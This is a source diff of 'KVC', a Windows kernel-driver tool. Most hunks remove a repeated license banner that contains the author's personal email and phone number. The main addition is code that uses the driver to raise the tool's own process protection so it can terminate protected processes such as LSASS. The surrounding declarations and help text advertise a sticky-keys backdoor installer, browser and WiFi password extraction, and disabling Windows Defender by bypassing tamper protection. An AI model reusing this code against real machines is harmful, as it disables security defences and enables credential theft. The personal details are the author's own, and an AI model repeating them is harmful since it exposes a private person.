Aktualizacja: 2025-09-23 01:38:42

kvc/BrowserOrchestrator.cpp

@@ -1,29 +1,4 @@
-/*******************************************************************************
+// BrowserOrchestrator.cpp
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
-// BrowserOrchestrator.cpp
 #include <Windows.h>
 #include <Rpc.h>
 #include <iostream>

kvc/Controller.h

@@ -10,10 +10,10 @@
 
 class ReportExporter;
 
-// Core kernel process structures
+// Core kernel process structures for EPROCESS manipulation
 struct ProcessEntry
 {
-    ULONG_PTR KernelAddress;        // EPROCESS structure address
+    ULONG_PTR KernelAddress;        // EPROCESS structure address in kernel space
     DWORD Pid;                      // Process identifier
     UCHAR ProtectionLevel;          // PP/PPL/None protection level
     UCHAR SignerType;               // Digital signature authority
@@ -43,7 +43,7 @@ struct SQLiteAPI
     int (*close_v2)(void*) = nullptr;
 };
 
-// Password extraction result structure
+// Password extraction result structure for DPAPI operations
 struct PasswordResult
 {
     std::wstring type;              // Chrome, Edge, WiFi credential type
@@ -104,6 +104,19 @@ public:
     bool UnprotectAllProcesses() noexcept;
     bool UnprotectMultipleProcesses(const std::vector<std::wstring>& targets) noexcept;
 
+    // Process termination with driver support
+    bool KillProcess(DWORD pid) noexcept;
+    bool KillProcessByName(const std::wstring& processName) noexcept;
+
+    // Kernel process access for external operations (ProcessManager)
+    std::optional<ULONG_PTR> GetProcessKernelAddress(DWORD pid) noexcept;
+    std::optional<UCHAR> GetProcessProtection(ULONG_PTR kernelAddress) noexcept;
+    std::vector<ProcessEntry> GetProcessList() noexcept;
+
+    // Self-protection operations for privilege escalation
+    bool SelfProtect(const std::wstring& protectionLevel, const std::wstring& signerType) noexcept;
+    std::optional<ProcessMatch> ResolveNameWithoutDriver(const std::wstring& processName) noexcept;
+
     // DPAPI password extraction with TrustedInstaller
     bool ShowPasswords(const std::wstring& outputPath) noexcept;
     bool ExportBrowserData(const std::wstring& outputPath, const std::wstring& browserType) noexcept;
@@ -142,10 +155,6 @@ public:
     bool StartDriverServiceSilent() noexcept;
     std::vector<BYTE> ExtractEncryptedDriver() noexcept;
     std::vector<BYTE> DecryptDriver(const std::vector<BYTE>& encryptedData) noexcept;
-	
-	// Self-protection operations
-    bool SelfProtect(const std::wstring& protectionLevel, const std::wstring& signerType) noexcept;
-	std::optional<ProcessMatch> ResolveNameWithoutDriver(const std::wstring& processName) noexcept;
 
     // Sticky keys backdoor management
     bool InstallStickyKeysBackdoor() noexcept;
@@ -162,7 +171,7 @@ private:
     bool EnablePrivilege(LPCWSTR privilegeName) noexcept;
     bool EnableDebugPrivilege() noexcept;
 	
-	// Enhanced file writing with TrustedInstaller privileges
+    // Enhanced file writing with TrustedInstaller privileges
     bool WriteFileWithPrivileges(const std::wstring& filePath, const std::vector<BYTE>& data) noexcept;
 
     // PE splitting with enhanced validation
@@ -172,7 +181,7 @@ private:
 
     // Atomic driver operations for stability
     bool ForceRemoveService() noexcept;
-	bool EnsureDriverAvailable() noexcept;
+    bool EnsureDriverAvailable() noexcept;
     bool IsDriverCurrentlyLoaded() noexcept;
     bool PerformAtomicInit() noexcept;
     bool PerformAtomicInitWithErrorCleanup() noexcept;
@@ -181,11 +190,8 @@ private:
     bool InstallDriverSilently() noexcept;
     bool RegisterDriverServiceSilent(const std::wstring& driverPath) noexcept;
 
-    // Kernel process management
+    // Internal kernel process management (implementation details)
     std::optional<ULONG_PTR> GetInitialSystemProcessAddress() noexcept;
-    std::optional<ULONG_PTR> GetProcessKernelAddress(DWORD pid) noexcept;
-    std::vector<ProcessEntry> GetProcessList() noexcept;
-    std::optional<UCHAR> GetProcessProtection(ULONG_PTR addr) noexcept;
     bool SetProcessProtection(ULONG_PTR addr, UCHAR protection) noexcept;
 
     // Process pattern matching with regex support
@@ -234,5 +240,4 @@ private:
 
     // Emergency cleanup for atomic operations
     bool PerformAtomicCleanup() noexcept;
-	
 };

kvc/ControllerBinaryManager.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // ControllerBinaryManager.cpp - Fixed compilation issues
 #include "Controller.h"
 #include "common.h"

kvc/ControllerCore.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // ControllerCore.cpp
 #include "Controller.h"
 #include "common.h"

kvc/ControllerDriverManager.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // ControllerDriverManager.cpp
 #include "Controller.h"
 #include "common.h"

kvc/ControllerDriverManager_.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // ControllerDriverManager.cpp
 #include "Controller.h"
 #include "common.h"

kvc/ControllerEventLogOperations.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "Controller.h"
 #include "common.h"
 

kvc/ControllerMemoryOperations.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // ControllerMemoryOperations.cpp
 #include "Controller.h"
 #include "common.h"

kvc/ControllerPasswordManager.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "Controller.h"
 #include "ReportExporter.h"
 #include "common.h"

kvc/ControllerProcessOperations.cpp

@@ -1,28 +1,4 @@
-/*******************************************************************************
+// ControllerProcessOperations.cpp
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "Controller.h"
 #include "common.h"
 #include "Utils.h"
@@ -33,6 +9,179 @@ that define these protections.
 
 extern volatile bool g_interrupted;
 
+// Process termination with protection elevation and fallback mechanisms
+bool Controller::KillProcess(DWORD pid) noexcept
+{
+    // Try to get kernel address first - if driver already initialized, reuse it
+    auto kernelAddr = GetProcessKernelAddress(pid);
+    
+    bool needsCleanup = false;
+    
+    // Only initialize driver if not already loaded AND we couldn't get kernel address
+    if (!kernelAddr && !IsDriverCurrentlyLoaded()) {
+        if (!PerformAtomicInitWithErrorCleanup()) {
+            return false;
+        }
+        needsCleanup = true;
+        
+        // Try again after driver initialization
+        kernelAddr = GetProcessKernelAddress(pid);
+    }
+    
+    // If we still can't get kernel address, try direct termination without protection elevation
+    if (!kernelAddr) {
+        INFO(L"Could not get kernel address for target process, proceeding without self-protection");
+        
+        HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
+        if (!hProcess) {
+            DWORD error = GetLastError();
+            ERROR(L"Failed to open process for termination (error: %d)", error);
+            if (needsCleanup) PerformAtomicCleanup();
+            return false;
+        }
+        
+        BOOL terminated = TerminateProcess(hProcess, 1);
+        DWORD error = GetLastError();
+        CloseHandle(hProcess);
+        
+        if (terminated) {
+            SUCCESS(L"Successfully terminated PID: %d (direct method)", pid);
+            if (needsCleanup) PerformAtomicCleanup();
+            return true;
+        } else {
+            ERROR(L"Failed to terminate process directly (error: %d)", error);
+            if (needsCleanup) PerformAtomicCleanup();
+            return false;
+        }
+    }
+
+    // Get target process protection level for elevation
+    auto targetProtection = GetProcessProtection(kernelAddr.value());
+    if (targetProtection && targetProtection.value() > 0) {
+        UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
+        UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
+        
+        std::wstring levelStr = (targetLevel == static_cast<UCHAR>(PS_PROTECTED_TYPE::Protected)) ? 
+                               L"PP" : L"PPL";
+        
+        INFO(L"Target process has %s-%s protection, elevating current process", 
+             levelStr.c_str(), 
+             Utils::GetSignerTypeAsString(targetSigner));
+
+        // Elevate current process protection to match or exceed target
+        UCHAR currentProcessProtection = Utils::GetProtection(targetLevel, targetSigner);
+        if (!SetCurrentProcessProtection(currentProcessProtection)) {
+            ERROR(L"Failed to elevate current process protection");
+            // Continue anyway - might still work
+        }
+    }
+
+    // Attempt standard process termination
+    HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
+    if (!hProcess) {
+        DWORD error = GetLastError();
+        ERROR(L"Failed to open process for termination (error: %d)", error);
+        
+        // Try with more privileges if available
+        hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
+        if (!hProcess) {
+            ERROR(L"Failed to open process with extended privileges (error: %d)", GetLastError());
+            if (needsCleanup) PerformAtomicCleanup();
+            return false;
+        }
+    }
+
+    BOOL terminated = TerminateProcess(hProcess, 1);
+    DWORD terminationError = GetLastError();
+    CloseHandle(hProcess);
+
+    if (terminated) {
+        SUCCESS(L"Successfully terminated PID: %d", pid);
+        if (needsCleanup) PerformAtomicCleanup();
+        return true;
+    } else {
+        ERROR(L"Failed to terminate PID: %d (error: %d)", pid, terminationError);
+        if (needsCleanup) PerformAtomicCleanup();
+        return false;
+    }
+}
+
+// Optimized batch process termination with shared driver state
+bool Controller::KillProcessByName(const std::wstring& processName) noexcept
+{
+    if (!PerformAtomicInitWithErrorCleanup()) {
+        return false;
+    }
+    
+    auto matches = FindProcessesByName(processName);
+    
+    if (matches.empty()) {
+        ERROR(L"No process found matching pattern: %s", processName.c_str());
+        PerformAtomicCleanup();
+        return false;
+    }
+    
+    DWORD successCount = 0;
+    DWORD totalCount = static_cast<DWORD>(matches.size());
+    
+    INFO(L"Found %d processes matching '%s'", totalCount, processName.c_str());
+    
+    for (const auto& match : matches) {
+        INFO(L"Attempting to terminate process: %s (PID %d)", 
+             match.ProcessName.c_str(), match.Pid);
+        
+        // Use direct kernel address since we already have it from FindProcessesByName
+        auto targetProtection = GetProcessProtection(match.KernelAddress);
+        if (targetProtection && targetProtection.value() > 0) {
+            UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
+            UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
+            
+            std::wstring levelStr = (targetLevel == static_cast<UCHAR>(PS_PROTECTED_TYPE::Protected)) ? 
+                                   L"PP" : L"PPL";
+            
+            INFO(L"Target process has %s-%s protection, elevating current process", 
+                 levelStr.c_str(), 
+                 Utils::GetSignerTypeAsString(targetSigner));
+
+            // Elevate current process protection to match or exceed target
+            UCHAR currentProcessProtection = Utils::GetProtection(targetLevel, targetSigner);
+            if (!SetCurrentProcessProtection(currentProcessProtection)) {
+                ERROR(L"Failed to elevate current process protection");
+                // Continue anyway - might still work
+            }
+        }
+
+        // Attempt termination with fallback approach
+        HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, match.Pid);
+        if (!hProcess) {
+            DWORD error = GetLastError();
+            INFO(L"Failed to open with PROCESS_TERMINATE (error: %d), trying PROCESS_ALL_ACCESS", error);
+            
+            hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, match.Pid);
+            if (!hProcess) {
+                ERROR(L"Failed to open process with any privileges (error: %d)", GetLastError());
+                continue;
+            }
+        }
+
+        BOOL terminated = TerminateProcess(hProcess, 1);
+        DWORD terminationError = GetLastError();
+        CloseHandle(hProcess);
+
+        if (terminated) {
+            SUCCESS(L"Successfully terminated: %s (PID %d)", 
+                   match.ProcessName.c_str(), match.Pid);
+            successCount++;
+        } else {
+            ERROR(L"Failed to terminate PID: %d (error: %d)", match.Pid, terminationError);
+        }
+    }
+    
+    INFO(L"Kill operation completed: %d/%d processes terminated", successCount, totalCount);
+    PerformAtomicCleanup();
+    return successCount > 0;
+}
+
 // Kernel process operations with interruption handling
 std::optional<ULONG_PTR> Controller::GetInitialSystemProcessAddress() noexcept {
     auto kernelBase = Utils::GetKernelBaseAddress();
@@ -52,7 +201,7 @@ std::optional<ULONG_PTR> Controller::GetProcessKernelAddress(DWORD pid) noexcept
             return entry.KernelAddress;
     }
     
-    ERROR(L"Failed to find kernel address for PID %d", pid);
+    INFO(L"Kernel address not available for PID %d, initializing driver...", pid);
     return std::nullopt;
 }
 
@@ -443,7 +592,8 @@ bool Controller::ListProtectedProcesses() noexcept {
 }
 
 // Process protection manipulation with atomic operations
-bool Controller::UnprotectProcess(DWORD pid) noexcept {
+bool Controller::UnprotectProcess(DWORD pid) noexcept
+{
     if (!PerformAtomicInitWithErrorCleanup()) {
         return false;
     }

kvc/ControllerSystemIntegration.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // ControllerSystemIntegration.cpp
 #include "Controller.h"
 #include "common.h"

kvc/DefenderManager.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "DefenderManager.h"
 #include <filesystem>
 #include <algorithm>

kvc/HelpSystem.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include <windows.h>
 #include "HelpSystem.h"
 #include <iostream>
@@ -36,6 +11,7 @@ void HelpSystem::PrintUsage(std::wstring_view programName) noexcept
     
     PrintServiceCommands();
     PrintBasicCommands();
+    PrintProcessTerminationCommands();
     PrintProtectionCommands();
     PrintSystemCommands();
     PrintBrowserCommands();
@@ -118,6 +94,17 @@ void HelpSystem::PrintBasicCommands() noexcept
     std::wcout << L"\n";
 }
 
+void HelpSystem::PrintProcessTerminationCommands() noexcept
+{
+    PrintSectionHeader(L"Process Termination Commands");
+    PrintCommandLine(L"kill <PID|process_name>", L"Terminate process with automatic protection elevation");
+    PrintCommandLine(L"kill <PID1,PID2,name3>", L"Terminate multiple processes (comma-separated)");
+    PrintNote(L"Supports process names: 'kill total' terminates Total Commander");
+    PrintNote(L"Automatically matches target protection level for protected processes");
+    PrintNote(L"Case-insensitive partial matching: 'notepad' matches 'notepad.exe'");
+    std::wcout << L"\n";
+}
+
 void HelpSystem::PrintProtectionCommands() noexcept
 {
     PrintSectionHeader(L"Process Protection Commands");
@@ -160,6 +147,7 @@ void HelpSystem::PrintSecurityEngineCommands() noexcept
     PrintCommandLine(L"secengine enable", L"Enable Windows Defender security engine"); 
     PrintCommandLine(L"secengine status", L"Check current security engine status");
     PrintCommandLine(L"secengine disable --restart", L"Disable and restart system immediately");
+    PrintCommandLine(L"secengine enable --restart", L"Enable and restart system immediately");
     PrintNote(L"Registry-level manipulation - bypasses tamper protection");
     PrintNote(L"System restart required for changes to take effect");
     std::wcout << L"\n";
@@ -311,6 +299,12 @@ void HelpSystem::PrintUsageExamples(std::wstring_view programName) noexcept
     printLine(L"set 5678 PP Windows", L"Force set PP-Windows protection");
     printLine(L"unprotect lsass", L"Remove protection from LSASS");
     printLine(L"unprotect 1,2,3,lsass", L"Batch unprotect multiple targets");
+	
+	// Process termination examples
+    printLine(L"kill 1234", L"Terminate process with PID 1234");
+    printLine(L"kill total", L"Terminate Total Commander by name");
+    printLine(L"kill 1234,5678,9012", L"Terminate multiple processes");
+    printLine(L"kill lsass", L"Terminate protected process (auto-elevation)");
     
     // TrustedInstaller examples
     printLine(L"trusted cmd", L"Run command as TrustedInstaller");
@@ -331,6 +325,7 @@ void HelpSystem::PrintUsageExamples(std::wstring_view programName) noexcept
     printLine(L"secengine disable", L"Disable Windows Defender engine");
     printLine(L"secengine enable", L"Re-enable Windows Defender engine");
     printLine(L"secengine disable --restart", L"Disable Defender and restart system");
+    printLine(L"secengine enable --restart", L"Enable Defender and restart system");
     
     // Data extraction examples
     printLine(L"export secrets", L"Export secrets to Downloads folder");

kvc/HelpSystem.h

@@ -18,6 +18,7 @@ public:
     static void PrintBasicCommands() noexcept;
     static void PrintProtectionCommands() noexcept;
     static void PrintSystemCommands() noexcept;
+	static void PrintProcessTerminationCommands() noexcept;
     static void PrintDefenderCommands() noexcept;
     static void PrintDPAPICommands() noexcept;
 	static void PrintBrowserCommands() noexcept;

kvc/KeyboardHook.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "KeyboardHook.h"
 #include "TrustedInstallerIntegrator.h"
 #include "common.h"

kvc/Kvc.cpp

@@ -1,31 +1,7 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "common.h"
 #include "Controller.h"
 #include "DefenderManager.h"
+#include "ProcessManager.h"
 #include "ServiceManager.h"
 #include "HelpSystem.h"
 #include <string_view>
@@ -393,6 +369,13 @@ int wmain(int argc, wchar_t* argv[])
                 return g_controller->DumpProcessByName(processName, outputPath) ? 0 : 2;
             }
         }
+		
+		// Process termination via kernel driver with batch support
+        else if (command == L"kill")
+        {
+            ProcessManager::HandleKillCommand(argc, argv, g_controller.get());
+            return 0;
+        }
         
         // Process information commands with color-coded protection status output
         else if (command == L"list")

kvc/Kvc.vcxproj

@@ -113,6 +113,7 @@
     <ClCompile Include="ControllerSystemIntegration.cpp" />
 	<ClCompile Include="ControllerPasswordManager.cpp" />
 	<ClCompile Include="ControllerEventLogOperations.cpp" />
+	<ClCompile Include="ProcessManager.cpp" />
     <ClCompile Include="OffsetFinder.cpp" />
     <ClCompile Include="kvc.cpp" />
     <ClCompile Include="kvcDrv.cpp" />

kvc/KvcDrv.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
